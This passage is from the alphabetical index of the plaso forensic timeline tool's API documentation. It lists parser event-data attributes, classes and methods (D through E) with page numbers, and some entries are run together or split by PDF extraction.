DATA_TYPE (plaso.parsers.safari_cookies.SafariBinaryCookieEventDataattribute), 392

DATA_TYPE (plaso.parsers.santa.SantaExecutionEventDataattribute), 393

DATA_TYPE (plaso.parsers.santa.SantaFileSystemEventDataattribute), 394

DATA_TYPE (plaso.parsers.santa.SantaMountEventDataattribute), 395

DATA_TYPE (plaso.parsers.sccm.SCCMLogEventDataattribute), 396

DATA_TYPE (plaso.parsers.selinux.SELinuxLogEventDataattribute), 397

DATA_TYPE (plaso.parsers.setupapi.SetupapiLogEventDataattribute), 398

DATA_TYPE (plaso.parsers.skydrivelog.SkyDriveLogEventDataattribute), 399

DATA_TYPE (plaso.parsers.skydrivelog.SkyDriveOldLogEventDataattribute), 400

DATA_TYPE (plaso.parsers.sophos_av.SophosAVLogEventDataattribute), 401

DATA_TYPE (plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItemEventDataattribute), 404

DATA_TYPE (plaso.parsers.sqlite_plugins.android_calls.AndroidCallEventDataattribute), 250

DATA_TYPE (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSEventDataattribute), 251

DATA_TYPE (plaso.parsers.sqlite_plugins.android_webview.WebViewCookieEventDataattribute), 252

DATA_TYPE (plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCacheEventDataattribute), 253

DATA_TYPE (plaso.parsers.sqlite_plugins.appusage.MacOSApplicationUsageEventDataattribute), 255

DATA_TYPE (plaso.parsers.sqlite_plugins.chrome_autofill.ChromeAutofillEventDataattribute), 255

DATA_TYPE (plaso.parsers.sqlite_plugins.chrome_cookies.ChromeCookieEventDataattribute), 257

DATA_TYPE (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventDataattribute), 258

DATA_TYPE (plaso.parsers.sqlite_plugins.chrome_history.ChromeHistoryFileDownloadedEventDataattribute), 259

DATA_TYPE (plaso.parsers.sqlite_plugins.chrome_history.ChromeHistoryPageVisitedEventDataattribute), 260

DATA_TYPE (plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookieEventDataattribute), 261

DATA_TYPE (plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadEventDataattribute), 262

DATA_TYPE (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkAnnotationEventDataattribute), 264

DATA_TYPE (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkEventDataattribute), 265

DATA_TYPE (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkFolderEventDataattribute), 265

DATA_TYPE (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesPageVisitedEventDataattribute), 266

DATA_TYPE (plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotCloudEntryEventDataattribute), 267

DATA_TYPE (plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotLocalEntryEventDataattribute), 268

DATA_TYPE (plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessageDataattribute), 268

DATA_TYPE (plaso.parsers.sqlite_plugins.imessage.IMessageEventDataattribute), 269

DATA_TYPE (plaso.parsers.sqlite_plugins.kik_ios.KikIOSMessageEventDataattribute), 271

520 Index


DATA_TYPE (plaso.parsers.sqlite_plugins.kodi.KodiVideoEventDataattribute), 272

DATA_TYPE (plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantineEventDataattribute), 273

DATA_TYPE (plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsEventDataattribute), 274

DATA_TYPE (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCApplicationEventDataattribute), 274

DATA_TYPE (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCSafariEventDataattribute), 275

DATA_TYPE (plaso.parsers.sqlite_plugins.mac_notes.MacNotesEventDataattribute), 276

DATA_TYPE (plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterEventDataattribute), 277

DATA_TYPE (plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCacheEventDataattribute), 278

DATA_TYPE (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCEntryattribute), 279

DATA_TYPE (plaso.parsers.sqlite_plugins.safari.SafariHistoryPageVisitedEventDataattribute), 280

DATA_TYPE (plaso.parsers.sqlite_plugins.skype.SkypeAccountEventDataattribute), 281

DATA_TYPE (plaso.parsers.sqlite_plugins.skype.SkypeCallEventDataattribute), 281

DATA_TYPE (plaso.parsers.sqlite_plugins.skype.SkypeChatEventDataattribute), 282

DATA_TYPE (plaso.parsers.sqlite_plugins.skype.SkypeSMSEventDataattribute), 283

DATA_TYPE (plaso.parsers.sqlite_plugins.skype.SkypeTransferFileEventDataattribute), 284

DATA_TYPE (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidContactEventDataattribute), 285

DATA_TYPE (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidConversationEventDataattribute), 285

DATA_TYPE (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidMessageEventDataattribute), 285

DATA_TYPE (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidContactEventDataattribute), 287

DATA_TYPE (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidSearchEventDataattribute), 288

DATA_TYPE (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidStatusEventDataattribute), 289

DATA_TYPE (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSContactEventDataattribute), 289

DATA_TYPE (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSStatusEventDataattribute), 291

DATA_TYPE (plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineGenericEventDataattribute), 291

DATA_TYPE (plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineUserEngagedEventDataattribute), 292

DATA_TYPE (plaso.parsers.sqlite_plugins.zeitgeist.ZeitgeistActivityEventDataattribute), 293

DATA_TYPE (plaso.parsers.symantec.SymantecEventDataattribute), 411

DATA_TYPE (plaso.parsers.syslog.SyslogCommentEventDataattribute), 411

DATA_TYPE (plaso.parsers.syslog.SyslogLineEventDataattribute), 412

DATA_TYPE (plaso.parsers.syslog_plugins.cron.CronTaskRunEventDataattribute), 294

DATA_TYPE (plaso.parsers.syslog_plugins.ssh.SSHFailedConnectionEventDataattribute), 295

DATA_TYPE (plaso.parsers.syslog_plugins.ssh.SSHLoginEventDataattribute), 295

DATA_TYPE (plaso.parsers.syslog_plugins.ssh.SSHOpenedConnectionEventDataattribute), 295

DATA_TYPE (plaso.parsers.systemd_journal.SystemdJournalEventDataattribute), 413

DATA_TYPE (plaso.parsers.trendmicroav.TrendMicroAVEventDataattribute), 418

DATA_TYPE (plaso.parsers.trendmicroav.TrendMicroUrlEventDataattribute), 420

DATA_TYPE (plaso.parsers.utmp.UtmpEventData at-tribute), 420

DATA_TYPE (plaso.parsers.utmpx.UtmpxMacOSEventDataattribute), 421

DATA_TYPE (plaso.parsers.vsftpd.VsftpdEventData at-tribute), 422

DATA_TYPE (plaso.parsers.winevt.WinEvtRecordEventDataattribute), 424

DATA_TYPE (plaso.parsers.winevtx.WinEvtxRecordEventDataattribute), 425

DATA_TYPE (plaso.parsers.winfirewall.WinFirewallEventDataattribute), 427

DATA_TYPE (plaso.parsers.winjob.WinJobEventDataattribute), 428

DATA_TYPE (plaso.parsers.winlnk.WinLnkLinkEventDataattribute), 430

DATA_TYPE (plaso.parsers.winprefetch.WinPrefetchExecutionEventDataattribute), 431

DATA_TYPE (plaso.parsers.winreg_plugins.appcompatcache.AppCompatCacheEventDataattribute), 297

DATA_TYPE (plaso.parsers.winreg_plugins.bagmru.BagMRUEventDataattribute), 297

DATA_TYPE (plaso.parsers.winreg_plugins.bam.BackgroundActivityModeratorEventDataattribute), 298

DATA_TYPE (plaso.parsers.winreg_plugins.ccleaner.CCleanerConfigurationEventDataattribute), 299

DATA_TYPE (plaso.parsers.winreg_plugins.ccleaner.CCleanerUpdateEventDataattribute), 300

DATA_TYPE (plaso.parsers.winreg_plugins.lfu.WindowsBootExecuteEventDataattribute), 304

DATA_TYPE (plaso.parsers.winreg_plugins.lfu.WindowsBootVerificationEventDataattribute), 304

DATA_TYPE (plaso.parsers.winreg_plugins.mountpoints.MountPoints2EventDataattribute), 305

DATA_TYPE (plaso.parsers.winreg_plugins.mrulist.MRUListEventDataattribute), 306

Index 521


DATA_TYPE (plaso.parsers.winreg_plugins.mrulistex.MRUListExEventDataattribute), 307

DATA_TYPE (plaso.parsers.winreg_plugins.msie_zones.MSIEZoneSettingsEventDataattribute), 309

DATA_TYPE (plaso.parsers.winreg_plugins.network_drives.NetworkDriveEventDataattribute), 310

DATA_TYPE (plaso.parsers.winreg_plugins.networks.WindowsRegistryNetworkListEventDataattribute), 311

DATA_TYPE (plaso.parsers.winreg_plugins.officemru.OfficeMRUListWindowsRegistryEventDataattribute), 311

DATA_TYPE (plaso.parsers.winreg_plugins.officemru.OfficeMRUWindowsRegistryEventDataattribute), 312

DATA_TYPE (plaso.parsers.winreg_plugins.outlook.OutlookSearchMRUEventDataattribute), 312

DATA_TYPE (plaso.parsers.winreg_plugins.programscache.ExplorerProgramsCacheEventDataattribute), 313

DATA_TYPE (plaso.parsers.winreg_plugins.run.RunKeyEventDataattribute), 314

DATA_TYPE (plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryEventDataattribute), 315

DATA_TYPE (plaso.parsers.winreg_plugins.services.WindowsRegistryServiceEventDataattribute), 316

DATA_TYPE (plaso.parsers.winreg_plugins.shutdown.ShutdownWindowsRegistryEventDataattribute), 317

DATA_TYPE (plaso.parsers.winreg_plugins.task_scheduler.TaskCacheEventDataattribute), 317

DATA_TYPE (plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientConnectionEventDataattribute), 318

DATA_TYPE (plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientMRUEventDataattribute), 318

DATA_TYPE (plaso.parsers.winreg_plugins.timezone.WindowsTimezoneSettingsEventDataattribute), 320

DATA_TYPE (plaso.parsers.winreg_plugins.typedurls.TypedURLsEventDataattribute), 320

DATA_TYPE (plaso.parsers.winreg_plugins.usb.WindowsUSBDeviceEventDataattribute), 321

DATA_TYPE (plaso.parsers.winreg_plugins.usbstor.USBStorEventDataattribute), 322

DATA_TYPE (plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryEventDataattribute), 323

DATA_TYPE (plaso.parsers.winreg_plugins.windows_version.WindowsRegistryInstallationEventDataattribute), 324

DATA_TYPE (plaso.parsers.winreg_plugins.winlogon.WinlogonEventDataattribute), 325

DATA_TYPE (plaso.parsers.winreg_plugins.winrar.WinRARHistoryEventDataattribute), 326

DATA_TYPE (plaso.parsers.winrestore.RestorePointEventDataattribute), 433

DATA_TYPE (plaso.parsers.xchatlog.XChatLogEventDataattribute), 434

DATA_TYPE (plaso.parsers.xchatscrollback.XChatScrollbackEventDataattribute), 435

DATA_TYPE (plaso.parsers.zsh_extended_history.ZshHistoryEventDataattribute), 437

DATA_TYPES (plaso.analysis.hash_tagging.HashTaggingAnalysisPluginattribute), 43

DATA_TYPES (plaso.analysis.nsrlsvr.NsrlsvrAnalysisPluginattribute), 47

DATA_TYPES (plaso.analysis.viper.ViperAnalysisPluginattribute), 51

DATA_TYPES (plaso.analysis.virustotal.VirusTotalAnalysisPluginattribute), 52

database_name (plaso.parsers.pls_recall.PlsRecallEventDataattribute), 383

DatabaseArgumentsHelper (class inplaso.cli.helpers.database_config), 64

DataLocationArgumentsHelper (class inplaso.cli.helpers.data_location), 64

DATE (plaso.parsers.text_parser.PyparsingConstants at-tribute), 415

DATE_ELEMENTS (plaso.parsers.text_parser.PyparsingConstantsattribute), 415

DATE_METADATA (plaso.parsers.iis.WinIISParser at-tribute), 354

date_time (plaso.containers.events.EventObject at-tribute), 104

date_time (plaso.containers.time_events.DateTimeValuesEventattribute), 118

DATE_TIME (plaso.parsers.iis.WinIISParser attribute),354

DATE_TIME (plaso.parsers.mac_appfirewall.MacAppFirewallParserattribute), 358

DATE_TIME (plaso.parsers.mac_securityd.MacOSSecuritydLogParserattribute), 362

DATE_TIME (plaso.parsers.text_parser.PyparsingConstantsattribute), 415

DATE_TIME_MSEC (plaso.parsers.text_parser.PyparsingConstantsattribute), 415

date_time_properties(plaso.parsers.olecf_plugins.summary.OLECFPropertySetStreamattribute), 238

DateFiltersArgumentsHelper (class inplaso.cli.helpers.date_filters), 65

DateTimeFileEntryFilter (class inplaso.filters.file_entry), 156

DateTimeValuesEvent (class inplaso.containers.time_events), 118

debug_mode (plaso.containers.sessions.Session at-tribute), 110

debug_mode (plaso.containers.sessions.SessionConfigurationattribute), 113

debug_output (plaso.engine.configurations.ProcessingConfigurationattribute), 122

decision (plaso.parsers.santa.SantaExecutionEventDataattribute), 392

default (plaso.formatters.interface.EnumerationEventFormatterHelperattribute), 171

default_gateway_mac

522 Index


(plaso.parsers.winreg_plugins.networks.WindowsRegistryNetworkListEventDataattribute), 311

DEFAULT_LANGUAGE_IDENTIFIER(plaso.formatters.mediator.FormatterMediatorattribute), 175

DEFAULT_LCID (plaso.formatters.mediator.FormatterMediatorattribute), 175

DEFAULT_PROFILING_SAMPLE_RATE(plaso.cli.helpers.profiling.ProfilingArgumentsHelperattribute), 74

DEFAULT_QUEUE_TIMEOUT(plaso.analysis.hash_tagging.HashTaggingAnalysisPluginattribute), 43

DEFAULT_REDIS_URL(plaso.storage.redis.redis_store.RedisStoreattribute), 455

default_value (plaso.filters.path_filter.PathFilterScanTreeNodeattribute), 165

DefaultFormatter (class inplaso.formatters.default), 168

DefaultOLECFPlugin (class inplaso.parsers.olecf_plugins.default), 235

DefaultPlugin (class inplaso.parsers.plist_plugins.default), 240

DefaultPlugin (class inplaso.parsers.winreg_plugins.default), 300

definfo (plaso.parsers.symantec.SymantecEventDataattribute), 407

defseqnumber (plaso.parsers.symantec.SymantecEventDataattribute), 407

deleteinfo (plaso.parsers.symantec.SymantecEventDataattribute), 407

DELIMITER (plaso.parsers.dsv_parser.DSVParser at-tribute), 345

DELIMITER (plaso.parsers.mactime.MactimeParser at-tribute), 365

DELIMITER (plaso.parsers.mcafeeav.McafeeAccessProtectionParserattribute), 369

DELIMITER (plaso.parsers.trendmicroav.TrendMicroBaseParserattribute), 419

dependencies_check(plaso.cli.log2timeline_tool.Log2TimelineToolattribute), 86

dependencies_check(plaso.cli.psteal_tool.PstealTool attribute),89

deprecated() (in module plaso.lib.decorators), 184depth (plaso.parsers.symantec.SymantecEventData at-

tribute), 407DeregisterAnalyzer()

(plaso.analyzers.manager.AnalyzersManagerclass method), 60

DeregisterAttributeContainer()(plaso.containers.manager.AttributeContainersManager

class method), 108DeregisterFormatter()

(plaso.formatters.manager.FormattersManagerclass method), 173

DeregisterHasher()(plaso.analyzers.hashers.manager.HashersManagerclass method), 55

DeregisterHelper()(plaso.cli.helpers.manager.ArgumentHelperManagerclass method), 70

DeregisterOutput()(plaso.output.manager.OutputManager classmethod), 205

DeregisterParser()(plaso.parsers.manager.ParsersManagerclass method), 366

DeregisterPlugin()(plaso.analysis.manager.AnalysisPluginManagerclass method), 45

DeregisterPlugin()(plaso.parsers.cookie_plugins.manager.CookiePluginsManagerclass method), 221

DeregisterPlugin()(plaso.parsers.interface.BaseParser classmethod), 355

DeregisterPlugin()(plaso.preprocessors.manager.PreprocessPluginsManagerclass method), 441

desc (plaso.containers.plist_event.PlistTimeEventDataattribute), 108

DESCRIPTION (plaso.analyzers.hashers.entropy.EntropyHasherattribute), 54

DESCRIPTION (plaso.analyzers.hashers.interface.BaseHasherattribute), 55

DESCRIPTION (plaso.analyzers.hashers.md5.MD5Hasherattribute), 57

DESCRIPTION (plaso.analyzers.hashers.sha1.SHA1Hasherattribute), 57

DESCRIPTION (plaso.analyzers.hashers.sha256.SHA256Hasherattribute), 58

DESCRIPTION (plaso.analyzers.hashing_analyzer.HashingAnalyzerattribute), 59

DESCRIPTION (plaso.analyzers.interface.BaseAnalyzerattribute), 59

DESCRIPTION (plaso.analyzers.yara_analyzer.YaraAnalyzerattribute), 61

DESCRIPTION (plaso.cli.helpers.analysis_plugins.AnalysisPluginsArgumentsHelperattribute), 62

DESCRIPTION (plaso.cli.helpers.artifact_definitions.ArtifactDefinitionsArgumentsHelperattribute), 63

DESCRIPTION (plaso.cli.helpers.artifact_filters.ArtifactFiltersArgumentsHelperattribute), 63

DESCRIPTION (plaso.cli.helpers.data_location.DataLocationArgumentsHelperattribute), 64

Index 523


DESCRIPTION (plaso.cli.helpers.database_config.DatabaseArgumentsHelperattribute), 64

DESCRIPTION (plaso.cli.helpers.date_filters.DateFiltersArgumentsHelperattribute), 65

DESCRIPTION (plaso.cli.helpers.dynamic_output.DynamicOutputArgumentsHelperattribute), 66

DESCRIPTION (plaso.cli.helpers.elastic_output.ElasticSearchOutputArgumentsHelperattribute), 66

DESCRIPTION (plaso.cli.helpers.event_filters.EventFiltersArgumentsHelperattribute), 67

DESCRIPTION (plaso.cli.helpers.extraction.ExtractionArgumentsHelperattribute), 67

DESCRIPTION (plaso.cli.helpers.filter_file.FilterFileArgumentsHelperattribute), 68

DESCRIPTION (plaso.cli.helpers.hashers.HashersArgumentsHelperattribute), 68

DESCRIPTION (plaso.cli.helpers.interface.ArgumentsHelperattribute), 69

DESCRIPTION (plaso.cli.helpers.language.LanguageArgumentsHelperattribute), 70

DESCRIPTION (plaso.cli.helpers.nsrlsvr_analysis.NsrlsvrAnalysisArgumentsHelperattribute), 71

DESCRIPTION (plaso.cli.helpers.output_modules.OutputModulesArgumentsHelperattribute), 72

DESCRIPTION (plaso.cli.helpers.parsers.ParsersArgumentsHelperattribute), 73

DESCRIPTION (plaso.cli.helpers.process_resources.ProcessResourcesArgumentsHelperattribute), 73

DESCRIPTION (plaso.cli.helpers.profiling.ProfilingArgumentsHelperattribute), 74

DESCRIPTION (plaso.cli.helpers.server_config.ServerArgumentsHelperattribute), 74

DESCRIPTION (plaso.cli.helpers.sessionize_analysis.SessionizeAnalysisArgumentsHelperattribute), 75

DESCRIPTION (plaso.cli.helpers.status_view.StatusViewArgumentsHelperattribute), 76

DESCRIPTION (plaso.cli.helpers.storage_file.StorageFileArgumentsHelperattribute), 76

DESCRIPTION (plaso.cli.helpers.storage_format.StorageFormatArgumentsHelperattribute), 77

DESCRIPTION (plaso.cli.helpers.tagging_analysis.TaggingAnalysisArgumentsHelperattribute), 77

DESCRIPTION (plaso.cli.helpers.temporary_directory.TemporaryDirectoryArgumentsHelperattribute), 78

DESCRIPTION (plaso.cli.helpers.text_prepend.TextPrependArgumentsHelperattribute), 79

DESCRIPTION (plaso.cli.helpers.timesketch_output.TimesketchOutputArgumentsHelperattribute), 79

DESCRIPTION (plaso.cli.helpers.vfs_backend.VFSBackEndArgumentsHelperattribute), 80

DESCRIPTION (plaso.cli.helpers.viper_analysis.ViperAnalysisArgumentsHelperattribute), 80

DESCRIPTION (plaso.cli.helpers.virustotal_analysis.VirusTotalAnalysisArgumentsHelperattribute), 81

DESCRIPTION (plaso.cli.helpers.windows_services_analysis.WindowsServicesAnalysisArgumentsHelperattribute), 82

DESCRIPTION (plaso.cli.helpers.workers.WorkersArgumentsHelperattribute), 82

DESCRIPTION (plaso.cli.helpers.xlsx_output.XLSXOutputArgumentsHelperattribute), 83

DESCRIPTION (plaso.cli.helpers.yara_rules.YaraRulesArgumentsHelperattribute), 83

DESCRIPTION (plaso.cli.image_export_tool.ImageExportToolattribute), 85

DESCRIPTION (plaso.cli.log2timeline_tool.Log2TimelineToolattribute), 86

DESCRIPTION (plaso.cli.pinfo_tool.PinfoTool at-tribute), 87

DESCRIPTION (plaso.cli.psort_tool.PsortTool at-tribute), 88

DESCRIPTION (plaso.cli.psteal_tool.PstealTool at-tribute), 90

description (plaso.engine.path_filters.PathFilter at-tribute), 132

DESCRIPTION (plaso.output.dynamic.DynamicOutputModuleattribute), 199

DESCRIPTION (plaso.output.elastic.ElasticsearchOutputModuleattribute), 199

DESCRIPTION (plaso.output.interface.OutputModuleattribute), 201

DESCRIPTION (plaso.output.json_line.JSONLineOutputModuleattribute), 202

DESCRIPTION (plaso.output.json_out.JSONOutputModuleattribute), 203

DESCRIPTION (plaso.output.kml.KMLOutputModuleattribute), 203

DESCRIPTION (plaso.output.l2t_csv.L2TCSVOutputModuleattribute), 204

DESCRIPTION (plaso.output.null.NullOutputModuleattribute), 209

DESCRIPTION (plaso.output.rawpy.NativePythonOutputModuleattribute), 209

DESCRIPTION (plaso.output.timesketch_out.TimesketchOutputModuleattribute), 213

DESCRIPTION (plaso.output.tln.L2TTLNOutputModuleattribute), 213

DESCRIPTION (plaso.output.tln.TLNOutputModule at-tribute), 214

DESCRIPTION (plaso.output.xlsx.XLSXOutputModuleattribute), 214

description (plaso.parsers.opera.OperaGlobalHistoryEventDataattribute), 380

description (plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCacheEventDataattribute), 277

description (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidContactEventDataattribute), 287

description (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSContactEventDataattribute), 289

524 Index


description (plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineGenericEventDataattribute), 291

description (plaso.parsers.symantec.SymantecEventDataattribute), 407

description (plaso.parsers.winjob.WinJobEventDataattribute), 428

description (plaso.parsers.winlnk.WinLnkLinkEventDataattribute), 429

description (plaso.parsers.winreg_plugins.networks.WindowsRegistryNetworkListEventDataattribute), 311

description (plaso.parsers.winrestore.RestorePointEventDataattribute), 432

dest_ip (plaso.parsers.winfirewall.WinFirewallEventDataattribute), 426

dest_port (plaso.parsers.winfirewall.WinFirewallEventDataattribute), 426

destination (plaso.parsers.bencode_plugins.transmission.TransmissionEventDataattribute), 216

destination (plaso.parsers.bencode_plugins.utorrent.UTorrentEventDataattribute), 217

destination (plaso.parsers.sqlite_plugins.skype.SkypeTransferFileEventDataattribute), 283

destination_ip (plaso.parsers.networkminer.NetworkMinerEventDataattribute), 376

destination_port (plaso.parsers.networkminer.NetworkMinerEventDataattribute), 376

detail (plaso.parsers.skydrivelog.SkyDriveLogEventDataattribute), 399

details (plaso.parsers.popcontest.PopularityContestSessionEventDataattribute), 388

device_id (plaso.parsers.plist_plugins.ipod.IPodPlistEventDataattribute), 244

device_path (plaso.containers.windows_events.WindowsVolumeEventDataattribute), 120

device_type (plaso.parsers.winreg_plugins.usbstor.USBStorEventDataattribute), 321

direction (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidMessageEventDataattribute), 285

directory (plaso.engine.configurations.ProfilingConfigurationattribute), 123

directory (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainersEventDataattribute), 228

directory (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCachePartitionsEventDataattribute), 229

display_name (plaso.engine.processing_status.ProcessStatusattribute), 136

display_name (plaso.parsers.filestat.FileStatEventDataattribute), 348

display_name (plaso.parsers.ntfs.NTFSFileStatEventDataattribute), 377

display_name (plaso.parsers.sqlite_plugins.skype.SkypeAccountEventDataattribute), 281

display_name (plaso.parsers.winreg_plugins.usbstor.USBStorEventDataattribute), 321

display_title (plaso.parsers.plist_plugins.safari.SafariHistoryEventDataattribute), 246

distance (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidContactEventDataattribute), 284

dll_name (plaso.parsers.pe.PEEventData attribute),382

dmg_path (plaso.parsers.santa.SantaMountEventDataattribute), 395

dns_suffix (plaso.parsers.winreg_plugins.networks.WindowsRegistryNetworkListEventDataattribute), 311

doc_security (plaso.parsers.czip_plugins.oxml.OpenXMLEventDataattribute), 223

doc_type (plaso.parsers.cups_ipp.CupsIppEventDataattribute), 340

doc_type (plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotCloudEntryEventDataattribute), 267

DockerJSONContainerEventData (class inplaso.parsers.docker), 342

DockerJSONContainerLogEventData (class inplaso.parsers.docker), 343

DockerJSONLayerEventData (class inplaso.parsers.docker), 343

DockerJSONParser (class in plaso.parsers.docker),343

DocumentSummaryInformationOLECFPlugin(class in plaso.parsers.olecf_plugins.summary),237

DocumentVersionsRow()(plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsPluginmethod), 274

domain (plaso.parsers.sqlite_plugins.android_webview.WebViewCookieEventDataattribute), 252

domain_guid (plaso.parsers.symantec.SymantecEventDataattribute), 407

domain_hash (plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsEventDataattribute), 218

domainname (plaso.parsers.symantec.SymantecEventDataattribute), 407

DpkgEventData (class in plaso.parsers.dpkg), 344DpkgParser (class in plaso.parsers.dpkg), 344drive_letter (plaso.parsers.winreg_plugins.network_drives.NetworkDriveEventData

attribute), 309drive_number (plaso.parsers.recycler.WinRecycleBinEventData

attribute), 390drive_serial_number

(plaso.parsers.winlnk.WinLnkLinkEventDataattribute), 429

drive_type (plaso.parsers.winlnk.WinLnkLinkEventDataattribute), 429

droid_file_identifier(plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsDestListEntryEventDataattribute), 234

droid_file_identifier(plaso.parsers.winlnk.WinLnkLinkEventData

Index 525


attribute), 429droid_volume_identifier

(plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsDestListEntryEventDataattribute), 234

droid_volume_identifier(plaso.parsers.winlnk.WinLnkLinkEventDataattribute), 429

dst_call (plaso.parsers.sqlite_plugins.skype.SkypeCallEventDataattribute), 281

DSVEventFormattingHelper (class inplaso.output.shared_dsv), 210

DSVOutputModule (class inplaso.output.shared_dsv), 210

DSVParser (class in plaso.parsers.dsv_parser), 345DtFabricBaseOLECFPlugin (class in

plaso.parsers.olecf_plugins.dtfabric_plugin),236

DtFabricBaseParser (class inplaso.parsers.dtfabric_parser), 346

DtFabricBasePlistPlugin (class inplaso.parsers.plist_plugins.dtfabric_plugin),240

DtFabricBaseWindowsRegistryPlugin (classin plaso.parsers.winreg_plugins.dtfabric_plugin),300

duration (plaso.cli.time_slices.TimeSlice attribute), 92duration (plaso.parsers.sqlite_plugins.android_calls.AndroidCallEventData

attribute), 250duration (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCApplicationEventData

attribute), 274duration (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCSafariEventData

attribute), 275duration (plaso.storage.time_range.TimeRange

attribute), 490DynamicFieldFormattingHelper (class in

plaso.output.dynamic), 199DynamicOutputArgumentsHelper (class in

plaso.cli.helpers.dynamic_output), 65DynamicOutputModule (class in

plaso.output.dynamic), 199

Eelapsed_seconds (plaso.parsers.zsh_extended_history.ZshHistoryEventData

attribute), 437ElasticSearchOutputArgumentsHelper (class

in plaso.cli.helpers.elastic_output), 66ElasticsearchOutputModule (class in

plaso.output.elastic), 199ElasticSearchServerArgumentsHelper (class

in plaso.cli.helpers.elastic_output), 66email (plaso.parsers.sqlite_plugins.skype.SkypeAccountEventData

attribute), 281Empty() (plaso.engine.zeromq_queue.ZeroMQBufferedQueue

method), 147

Empty() (plaso.storage.event_heaps.SerializedEventHeapmethod), 466

Empty() (plaso.storage.file_interface.SerializedAttributeContainerListmethod), 469

EMPTY_QUEUE_WAIT_TIME(plaso.analysis.hash_tagging.HashAnalyzerattribute), 43

ENABLE_IN_EXTRACTION(plaso.analysis.browser_search.BrowserSearchPluginattribute), 39

ENABLE_IN_EXTRACTION(plaso.analysis.chrome_extension.ChromeExtensionPluginattribute), 40

ENABLE_IN_EXTRACTION(plaso.analysis.file_hashes.FileHashesPluginattribute), 41

ENABLE_IN_EXTRACTION(plaso.analysis.interface.AnalysisPluginattribute), 44

ENABLE_IN_EXTRACTION(plaso.analysis.sessionize.SessionizeAnalysisPluginattribute), 49

ENABLE_IN_EXTRACTION(plaso.analysis.tagging.TaggingAnalysisPluginattribute), 49

ENABLE_IN_EXTRACTION(plaso.analysis.unique_domains_visited.UniqueDomainsVisitedPluginattribute), 50

ENABLE_IN_EXTRACTION(plaso.analysis.windows_services.WindowsServicesAnalysisPluginattribute), 54

enabled_parser_names(plaso.containers.sessions.Session attribute),110

enabled_parser_names(plaso.containers.sessions.SessionConfigurationattribute), 113

EnableFreeAPIKeyRateLimit()(plaso.analysis.virustotal.VirusTotalAnalysisPluginmethod), 52

EnablePlugins() (plaso.parsers.interface.BaseParsermethod), 355

EnablePlugins() (plaso.parsers.syslog.SyslogParsermethod), 412

EncodedTextReader (class inplaso.parsers.text_parser), 414

encoding() (plaso.output.mediator.OutputMediatorproperty), 208

end_of_line (plaso.lib.line_reader_file.BinaryLineReaderattribute), 187

end_timestamp (plaso.storage.time_range.TimeRangeattribute), 490

end_timestamp() (plaso.cli.time_slices.TimeSliceproperty), 92

526 Index


engine() (plaso.analysis.browser_search.SEARCH_OBJECTproperty), 39

entries (plaso.parsers.winreg_plugins.bagmru.BagMRUEventDataattribute), 297

entries (plaso.parsers.winreg_plugins.mrulist.MRUListEventDataattribute), 305

entries (plaso.parsers.winreg_plugins.mrulistex.MRUListExEventDataattribute), 307

entries (plaso.parsers.winreg_plugins.officemru.OfficeMRUListWindowsRegistryEventDataattribute), 311

entries (plaso.parsers.winreg_plugins.outlook.OutlookSearchMRUEventDataattribute), 312

entries (plaso.parsers.winreg_plugins.programscache.ExplorerProgramsCacheEventDataattribute), 313

entries (plaso.parsers.winreg_plugins.run.RunKeyEventDataattribute), 314

entries (plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientConnectionEventDataattribute), 318

entries (plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientMRUEventDataattribute), 318

entries (plaso.parsers.winreg_plugins.typedurls.TypedURLsEventDataattribute), 320

entries (plaso.parsers.winreg_plugins.winrar.WinRARHistoryEventDataattribute), 326

EntropyHasher (class inplaso.analyzers.hashers.entropy), 54
